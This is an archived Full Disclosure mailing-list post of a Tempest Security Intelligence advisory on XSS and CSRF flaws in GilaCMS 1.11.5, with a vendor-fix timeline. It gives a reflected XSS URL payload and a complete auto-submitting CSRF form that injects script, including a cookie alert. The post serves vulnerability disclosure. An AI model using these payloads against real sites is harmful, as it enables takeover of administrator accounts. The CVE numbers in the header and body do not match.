GilaCMS - CVE-2019-13364 CVE-2019-13363

Related Vulnerabilities: CVE-2019-13364   CVE-2019-13363   CVE-2019-20804   CVE-2019-20803  
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="28"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#29">By Date</a>
<a href="30"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="28"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#29">By Thread</a>
<a href="30"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">GilaCMS - CVE-2019-13364 CVE-2019-13363</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: Rodolfo Augusto do Nascimento Tavares &lt;rodolfo.tavares () tempest com br&gt;


<em>Date</em>: Tue, 23 Jun 2020 15:27:43 -0300


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">=====[ Tempest Security Intelligence - ADV-07/2020
]==========================

GilaCMS - Version 1.11.5

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================
 * Overview
 * Detailed description
 * Timeline of disclosure
 * Thanks &amp; Acknowledgements
 * References

=====[ Vulnerability
Information]=============================================
 * Class: Improper Neutralization of Input During Web Page Generation
 ('Cross-site Scripting') [CWE-79], Cross-Site Request Forgery
 (CSRF) [CWE-352]

 * CVSS:6.8.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

 * CVE-2019-20804, CVE-2019-20803

=====[ Overview]========================================================
 * System affected : GilaCMS - Version 1.11.5
 * Software Version : Version 1.11.5 (other versions may also be affected).
 * Impacts :

 * XSS: Gila CMS before 1.11.6 is vulnerable to reflected XSS via the
admin/content/postcategory in the id parameter, which is mishandled by
g_preview_them.

 * XSS and CSRF: Gila CMS before 1.11.6 allows for CSRF resulting in XSS
via the admin/themes URI, leading to full compromise of the admin account.

=====[ Detailed
description]=================================================

1- XSS at [
<a rel="nofollow" href="http://localhostgila.com/admin/content/postcategory">http://localhostgila.com/admin/content/postcategory</a>|<a rel="nofollow" href="http://localhostgila.com/admin/content/postcategory*">http://localhostgila.com/admin/content/postcategory*</a>]
id parameter:

To exploit the XSS via GET in the endpoint *cm/edit_form/postcategory* and
parameter *id*, just insert a double quotes character (") to escape the
string the, close the current by adding a "&gt;" then include a javascript
payload. Follows an example:

 * [<a rel="nofollow" href="http://localhostgila.com/cm/edit_form/postcategory?id=8">http://localhostgila.com/cm/edit_form/postcategory?id=8</a>
"&gt;&lt;script&gt;alert(1)&lt;/script&gt;]

2- CSRF and XSS at admin/themes:

The following HTML code exploits both XSS and CSRF vulnerabilities. The
admin/themes form is vulnerable to CSRF due to the lack of anti-CSRF
tokens, and to XSS due to no proper validations of its inputs. To exploit
these vulnerabilities, an attacker should host the following form and trick
the administrator into visit this page.

&lt;html&gt; &lt;body&gt; &lt;script&gt;history.pushState('', '', '/') &lt;/script&gt;
&lt;form action="
<a rel="nofollow" href="http://localhostgila.com/admin/themes?g_response=content&amp;save_options=startbootstrap-creative&quot;">http://localhostgila.com/admin/themes?g_response=content&amp;save_options=startbootstrap-creative"</a>;
method="POST" enctype="multipart/form-data"&gt;
&lt;input type="hidden" name="option[color]" value="#e91428" /&gt;
&lt;input type="hidden" name="option[header-title]" value="Test" /&gt;
 &lt;input type="hidden" name="option[header-text]"
value=""&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;!--" /&gt;
 &lt;input type="hidden" name="option[header-image]" value="" /&gt;
 &lt;input type="hidden" name="option[about-title]"
value="&lt;script&gt;alert(0)&lt;script&gt;" /&gt;
 &lt;input type="hidden" name="option[about-text]"
value="&lt;script&gt;alert(3)&lt;script&gt;" /&gt;
 &lt;input type="hidden" name="option[service-category]" value="1" /&gt;
 &lt;input type="hidden" name="option[project-category]"value="1" /&gt;
 &lt;input type="hidden"
name="option[contact-title]"value="&lt;script&gt;alert(4)&lt;script&gt;" /&gt;
 &lt;input type="hidden" name="option[contact-text]"
value="&lt;script&gt;alert(5)&lt;script&gt;" /&gt;
 &lt;input type="hidden" name="option[contact-email]"
value="&lt;script&gt;alert(6)&lt;script&gt;" /&gt;
 &lt;input type="hidden" name="option[contact-phone]"
value="&lt;script&gt;alert(7)&lt;script&gt;" /&gt;
 &lt;input type="submit" value="Submit request" /&gt;&lt;/form&gt;
 &lt;script&gt;
 document.forms[0].submit(); &lt;/script&gt;
 &lt;/body&gt;
 &lt;/html&gt;

=====[ Timeline of
disclosure]===============================================

29/Oct/2019 - Responsible disclosure was initiated with the vendor.
02/Nov/2019 - GilaCms confirmed the issue;
07/Nov/2019 - The vendor fixed the vulnerability CSRF.
07/Nov/2019 - The vendor fixed the vulnerability XSS.
22/May/2020 - CVEs was assigned and reserved as CVE-2019-13364
CVE-2019-13363

=====[ Thanks &amp; Acknowledgements]========================================
 * Tempest Security Intelligence [5]

=====[ References ]=====================================================

[1][ [
<a rel="nofollow" href="https://cwe.mitre.org/data/definitions/352.html">https://cwe.mitre.org/data/definitions/352.html</a>]|<a rel="nofollow" href="https://cwe.mitre.org/data/definitions/352.html">https://cwe.mitre.org/data/definitions/352.html</a>
]
[2][ [
<a rel="nofollow" href="https://cwe.mitre.org/data/definitions/79.html">https://cwe.mitre.org/data/definitions/79.html</a>]|<a rel="nofollow" href="https://cwe.mitre.org/data/definitions/79.html">https://cwe.mitre.org/data/definitions/79.html</a>
]
[3][ [<a rel="nofollow" href="https://github.com/GilaCMS/gila/issues/56">https://github.com/GilaCMS/gila/issues/56</a>]]
[4][ [<a rel="nofollow" href="https://github.com/GilaCMS/gila/issues/57">https://github.com/GilaCMS/gila/issues/57</a>]]
[5][ [<a rel="nofollow" href="https://www.tempest.com.br">https://www.tempest.com.br</a>|
<a rel="nofollow" href="https://www.tempest.com.br/">https://www.tempest.com.br/</a>]|<a rel="nofollow" href="https://www.tempest.com.br/">https://www.tempest.com.br/</a>]

=====[ EOF ]===========================================================
</pre><p><strong>Attachment:
<a href="att-29/adv-gila.txt"><tt>adv-gila.txt</tt></a></strong>

<em>Description:</em> </p>
<pre style="margin: 0em;">
_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="28"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#29">By Date</a>
<a href="30"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="28"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#29">By Thread</a>
<a href="30"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>GilaCMS - CVE-2019-13364 CVE-2019-13363</strong> <em>Rodolfo Augusto do Nascimento Tavares (Jun 23)</em>
</li></ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>